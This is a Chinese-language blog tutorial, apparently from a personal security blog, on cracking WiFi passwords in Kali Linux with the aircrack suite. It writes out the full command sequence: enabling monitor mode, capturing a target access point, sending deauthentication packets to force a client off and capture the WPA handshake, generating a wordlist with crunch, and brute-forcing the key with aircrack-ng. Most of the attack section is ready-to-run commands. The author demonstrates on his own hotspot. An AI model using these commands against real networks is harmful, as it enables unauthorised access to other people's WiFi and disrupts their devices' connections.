对Kali Linux的学习也有段时间了,之前主要集中在Web层面的一些应用。最近对无线Hacker比较感兴趣,包括WiFi破解、Kali实现钓鱼WiFi以及GSM嗅探等。今天先分享下Kali下面破解WiFi的一个简明教程吧!


环境:Kali Rolling/Kali2016.1 (WMware 11)
设备: Ralink 802.11 n WLAN(淘宝即可购得,新版kali兼容大量无线网卡驱动,找一款能兼容的外置无线网卡即可)
所需软件:aircrack(自带)


0x01 开始前的准备

首先把外置无线网卡插入电脑,然后加载入当前kali虚拟机。完成后用ifconfig命令查看无线网卡是否安装成功:如图wlan0
1.png
并将wlan0网卡开启混杂模式:

airmon-ng start wlan0
#提示要杀掉一些进程,根据提示进行即可
airmon-ng check kill 
airmon-ng start wlan0

2.png

0x02 开始抓取握手包

  1. 首先,查看附近WiFi热点,使用命令airodump-ng wlan0mon
    3.png

  2. 选取其中信号较好的WiFi热点,在这里我直接用我的WiFi热点做演示(4227X)
    3.使用airodump-ng对选取的WiFi热点进行cap监听与获取:

airodump-ng -c 11 --bssid EC:26:CA:34:OA:2C -w 4227X  wlan0mon

-c 通道值 WiFi热点所对应的CH值(上图中可看到)
--bssid 需要破解WiFi的MAC值
-w cap文件名
wlan0mon 启用混杂模式的网卡名

4.png

  1. 可以看到4227X这个WiFi热点下有7个设备正在连接中,选取其中一个你喜欢的,进行断网从而抓取之握手包:
aireplay-ng -0 20 -c 64:5A:04:34:5A:0A -a EC:26:CA:34:OA:2C wlanmon

-0 death模式,20为发送次数
-c 你所选择要断网操作的客户机MAC
-a WiFi热点MAC

如图,可以看到握手包已经抓取到了,接下来就是破解操作了!
5.png

0x03 暴力破解

1.首先需要一个字典,可以找网上现成的,或者用工具生成一个字典,这里我们用crunch生成一个简单字典:
20.png
2.开始跑握手包

#首先ls查看当前目录所产生的握手包
aircrack-ng -w die.txt 4227X-01.cap

123.png

  1. 字典的设置还是比较关键的!当出现Key Found 的时候表明你成功了!
    QQ截图20160829233329.png

本文出自0h1in9e's Blog , 链接:https://www.ohlinge.cn,非商业转载请注明作者及出处,商业转载请联系作者本人。